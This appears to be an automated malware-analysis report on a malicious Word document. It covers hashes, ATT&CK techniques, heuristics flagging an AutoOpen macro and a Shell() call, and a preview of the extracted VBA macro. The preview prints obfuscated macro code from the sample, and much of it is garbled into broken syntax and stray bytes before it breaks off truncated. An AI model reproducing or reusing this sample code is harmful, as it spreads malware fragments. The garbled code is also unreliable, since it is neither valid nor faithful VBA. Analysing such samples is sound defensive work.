Office (OLE) malware analysis — malicious · f8d7943ed797926c

MALICIOUS

Office (OLE)

182.0 KB Created: 2018-04-26 07:10:00 Authoring application: Microsoft Office Word First seen: 2019-03-18

MD5: 5a0c6e031e662d64c7617dec59d8e65e SHA-1: 0e04cb63dd1bfe0bdb8580739c5be7e1602c0369 SHA-256: f8d7943ed797926cbf0c9e7fd38fd92179539dcc8e3c79ce56416f5fa738fdd8

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The critical heuristic firing indicates a Shell() call within the VBA, suggesting the macro is intended to execute arbitrary commands. The presence of an AutoOpen macro further supports this, as it automatically runs upon document opening. The macro's obfuscated nature and truncated script prevent a definitive analysis of its exact payload, but the overall intent is to download and execute a secondary malicious file.

Heuristics 5

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 183820 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	183820 bytes
SHA-256: `da1136182d74715a5eadd07dc7b4b650b9f9e692e3b7a729d10fb86a0c3b7781`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fzcJdPKQGBU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creata`le = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customiza`le = True Sub qdspn(tkPEw) Select Case GUNGw Case 79172 iAdSb = Hex(tRYVka - ChrW(TAUnO)) jijzj = CByte(66305) CkQrDO = QdPNK Case 32411 uuUPf = drGAZs IpzCwk = Round(54408) IAhSVN = Log(nkGdz) End Select End Sub Sub lnMiBE(LdQRK) Select Case EaiNQZ Case 78002 mtnzJP = Hex(EVtvv - ChrW(WBlTvf)) PijPH = CByte(88727) dEXqD = OzuYk Case 84700 wGIXVP = iZztUt VHJXqP = Round(12120) zzCrmY = Log(HMiDq) End Select Select Case IWMtr Case 11096 EHiVJb = Hex(skAuci - ChrW(HKUdd)) LRkKR = CByte(6615) Mkzdw = frsTh Case 65157 fdWMo = HJBMrP qPmWT = Round(7432) DjHmW = Log(TDIOqnX"SjiuYnd(121hrW(TAUnO)) 27) 2 wGIXVP = iZztUld Sub08002 mtnzJP = H hWWlv) PjHe QFt End Sub zF"End Sub Sub lnMiBE(LdQRK) Skp Case 65157 Em wGIXVP = iZzt !cskAuc83�"GH hWWlv) CkQrDO = QdPNKzM pVj jXVP = iZztUt 4 = CByte(6615) 9ƒ CByte(6615 nDqJZzt t Case EaiNQZ ect Select Casee IWMtr r IWMtr CaY) `d = TrT = R8891nd Sub Sub lnMMjNXCQ = K) RdmDj Case 651qD = OzuYk GQztiu(mVUjOS 7 TdzfiO CaYt !c48428 CaY) EpVose(66CkQrEZHD= QdPNKzM OiYHvBVP = iZztUt 4 = OjIjnz = 15) 7763t Case IWMtr HYRFSzt tXqBud)) t !c2elec83�"GH hWWlv) ZLTzs SeHXTXuuUPf = drGA JNFFGe(66TrT = 2 6t Case IWMtr jltK SeK) HiFAH Case 6517 SHwPoF CaYt !c49908 CaY) zAwiV = CkQrwKkwoQdPNKzM odqaZpVP = iZztUt 4 = HLYSTKR =15) 4092End Sub Sub lnMBQpQ NSimLolec83�"GH hWWlv)85364ub lnMBQpQ CwzIMSGA oQWqzcNSimLolec83�"GCbhfWlv) K) R1186 b l b l b wuvjmLSubk LHnOAkiu(mVUjOS 7 Mkzdw = frsTAutoopen(iu(On Error Resive Nexd))7 ObKGz = iZztUld Sub0800753 Case 78002 tzRZLLSubCkQrBHtntLQdPNKzM CcZHMVP = iZztUt 4 = JjbwrUSub15) 7621t Case IWMtr WYUSKR =AwONzNSimLolec83t !c2973 mtnGfUMrSubkYihpVNSimLolec83�"GcKXTiSub K) R83163iu(b l b l b qijYV = k ACFNLH Case 651TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cbori 7 jpZufNSimLolec83t !c1605iVJb = Hex(skAuicwvrzt tCkQrITUViXQdPNKzM ZHPhiJVP = iZztUt 4 = PqsuXV = 15) 31616 b l b l b jSfzFSubaGLunuNSimLolec83t !c371 Case 78002 TVwZLSubiJNzuuUPf = drGA OmEBUrSub K) Rct 89ƒ CByte(6615 mCpiS Enk ADnvOciu( Mkzd1 EXqD = OzuYk WWzzJ(iXFiAiu(7 PoCKwGIXVP = iZztUt 91044ub lnMBQpQ CXVRf SeH408rKhFZQdPNKzM jTGPhVP = iZztUt 4 = WhPRKR =15) 9 t Case IWMtr hIEL wGNzqEmF CaYt !c8368iVJb = Hex(skAupSvzS RpIYUGNSimLolec83b lNIGGUSub K) Rc5896 b l b l b wnziLzt tk tPUJ Case 65157 hPTUzNSimLolec83t !c 9Casee IWMtr QTvmimSubCkQrmhwjkQdPNKzM CqfwOVP = iZztUt 4 = TdXanSub15) 2el95) mVzol IWMwQfrMNSimLolec83t !c9195NSimLolec83b lBQMQ= H WRqkXNSimLolec83b lqzwstSub K) R14968iu(b l b l b zzoosSubk XjXmLiu( Mkzd1 EX7 kJjRNLNSimLolec83t !c19698 CaY) pHVfN121hCkQrSGwXljQdPNKzM EZNbTDVP = iZztUt 4 = sziiz = 15) 75193iu(b l b l b KjljiISubsiJba = iZztUld Sub080958 VHJXqP YOZDve(66ElsH = iZztUld Sb lIqAPiiSub K) R15536iu(b l b l b NrCb Selk vDzsViu( Mkzd1 EX MkzdOzuYk RaQEt(sCczobiu(7 kjnILuuUPf = drGAt !c9749 VHJXqP BLXXcnSubCkQrMAlzlVQdPNKzM hawWmqVP = iZztUt 4 = wNCbASub15) 44436 b l b l b HuowWKR =OshQENSimLolec83t !c694ub lnMBQpQ CcNpqFe(66NMpJe EaiNQZ ectb lEzUvbQ = K) R29694iu(b lb lb lb lGzCOFSubk ShOFiiu( Mkzd1 EX MkzdOzuY Attribute VB_Name = "OUzNkvSathznO" Sub MRYlp(klWQnb) Select Case p ... (truncated)

SHA-256: da1136182d74715a5eadd07dc7b4b650b9f9e692e3b7a729d10fb86a0c3b7781

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fzcJdPKQGBU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creata`le = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customiza`le = True
Sub qdspn(tkPEw)
Select Case GUNGw
         Case 79172
            iAdSb = Hex(tRYVka - ChrW(TAUnO))
            jijzj = CByte(66305)
            CkQrDO = QdPNK
         Case 32411
            uuUPf = drGAZs
            IpzCwk = Round(54408)
            IAhSVN = Log(nkGdz)
End Select
End Sub
Sub lnMiBE(LdQRK)
Select Case EaiNQZ
         Case 78002
            mtnzJP = Hex(EVtvv - ChrW(WBlTvf))
            PijPH = CByte(88727)
            dEXqD = OzuYk
         Case 84700
            wGIXVP = iZztUt
            VHJXqP = Round(12120)
            zzCrmY = Log(HMiDq)
End Select
Select Case IWMtr
         Case 11096
            EHiVJb = Hex(skAuci - ChrW(HKUdd))
            LRkKR = CByte(6615)
            Mkzdw = frsTh
         Case 65157
            fdWMo = HJBMrP
            qPmWT = Round(7432)
            DjHmW = Log(TDIOqnX"SjiuYnd(121hrW(TAUnO))
  27)
2           wGIXVP = iZztUld Sub08002
            mtnzJP = H hWWlv)
      PjHe    QFt
End Sub
zF"End Sub
Sub lnMiBE(LdQRK)
Skp          Case 65157
Em            wGIXVP = iZzt  !cskAuc83�"GH hWWlv)
         CkQrDO = QdPNKzM pVj jXVP = iZztUt 4 = CByte(6615)
     9ƒ CByte(6615
 nDqJZzt t Case EaiNQZ
ect
Select Casee IWMtr
     r IWMtr
         CaY)
    `d = TrT = R8891nd Sub
Sub lnMMjNXCQ = K)
RdmDj       Case 651qD = OzuYk
 GQztiu(mVUjOS   7
         TdzfiO        CaYt  !c48428        CaY)
EpVose(66CkQrEZHD= QdPNKzM OiYHvBVP = iZztUt 4 = OjIjnz = 15)
 7763t Case IWMtr
  HYRFSzt tXqBud))
       t  !c2elec83�"GH hWWlv)
ZLTzs
SeHXTXuuUPf = drGA
  JNFFGe(66TrT = 2
6t Case IWMtr
  jltK
SeK)
HiFAH       Case 6517
         SHwPoF        CaYt  !c49908        CaY)
zAwiV = CkQrwKkwoQdPNKzM odqaZpVP = iZztUt 4 = HLYSTKR =15)
 4092End Sub
Sub lnMBQpQ
  NSimLolec83�"GH hWWlv)85364ub lnMBQpQ
  CwzIMSGA
oQWqzcNSimLolec83�"GCbhfWlv) K)
R1186   b l  b l  b wuvjmLSubk
 LHnOAkiu(mVUjOS   7
 Mkzdw = frsTAutoopen(iu(On Error Resive Nexd))7
         ObKGz = iZztUld Sub0800753  Case 78002
 tzRZLLSubCkQrBHtntLQdPNKzM CcZHMVP = iZztUt 4 = JjbwrUSub15)
 7621t Case IWMtr
  WYUSKR =AwONzNSimLolec83t  !c2973            mtnGfUMrSubkYihpVNSimLolec83�"GcKXTiSub K)
R83163iu(b l  b l  b qijYV = k
 ACFNLH       Case 651TwAnpriVPuCRCS (ICDHlz + AInfKjatEJwj + cbori
   7
         jpZufNSimLolec83t  !c1605iVJb = Hex(skAuicwvrzt tCkQrITUViXQdPNKzM ZHPhiJVP = iZztUt 4 = PqsuXV = 15)
 31616   b l  b l  b jSfzFSubaGLunuNSimLolec83t  !c371   Case 78002
 TVwZLSubiJNzuuUPf = drGA
  OmEBUrSub K)
Rct 89ƒ CByte(6615
 mCpiS
Enk
 ADnvOciu( Mkzd1
  EXqD = OzuYk
 WWzzJ(iXFiAiu(7
         PoCKwGIXVP = iZztUt
91044ub lnMBQpQ
  CXVRf
SeH408rKhFZQdPNKzM jTGPhVP = iZztUt 4 = WhPRKR =15)
 9   t Case IWMtr
  hIEL  wGNzqEmF        CaYt  !c8368iVJb = Hex(skAupSvzS    RpIYUGNSimLolec83b lNIGGUSub K)
Rc5896   b l  b l  b wnziLzt tk
 tPUJ       Case 65157

        hPTUzNSimLolec83t  !c   9Casee IWMtr
  QTvmimSubCkQrmhwjkQdPNKzM CqfwOVP = iZztUt 4 = TdXanSub15)
 2el95)
            mVzol IWMwQfrMNSimLolec83t  !c9195NSimLolec83b lBQMQ= H WRqkXNSimLolec83b lqzwstSub K)
R14968iu(b l  b l  b zzoosSubk
 XjXmLiu( Mkzd1
  EX7
         kJjRNLNSimLolec83t  !c19698        CaY)
pHVfN121hCkQrSGwXljQdPNKzM EZNbTDVP = iZztUt 4 = sziiz = 15)
 75193iu(b l  b l  b KjljiISubsiJba = iZztUld Sub080958        VHJXqP YOZDve(66ElsH = iZztUld Sb lIqAPiiSub K)
R15536iu(b l  b l  b NrCb Selk
 vDzsViu( Mkzd1
  EX MkzdOzuYk
 RaQEt(sCczobiu(7
         kjnILuuUPf = drGAt  !c9749        VHJXqP BLXXcnSubCkQrMAlzlVQdPNKzM hawWmqVP = iZztUt 4 = wNCbASub15)
 44436   b l  b l  b HuowWKR =OshQENSimLolec83t  !c694ub lnMBQpQ
  CcNpqFe(66NMpJe EaiNQZ
ectb lEzUvbQ =  K)
R29694iu(b lb lb lb lGzCOFSubk
 ShOFiiu( Mkzd1
  EX MkzdOzuY
Attribute VB_Name = "OUzNkvSathznO"
Sub MRYlp(klWQnb)
Select Case p
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.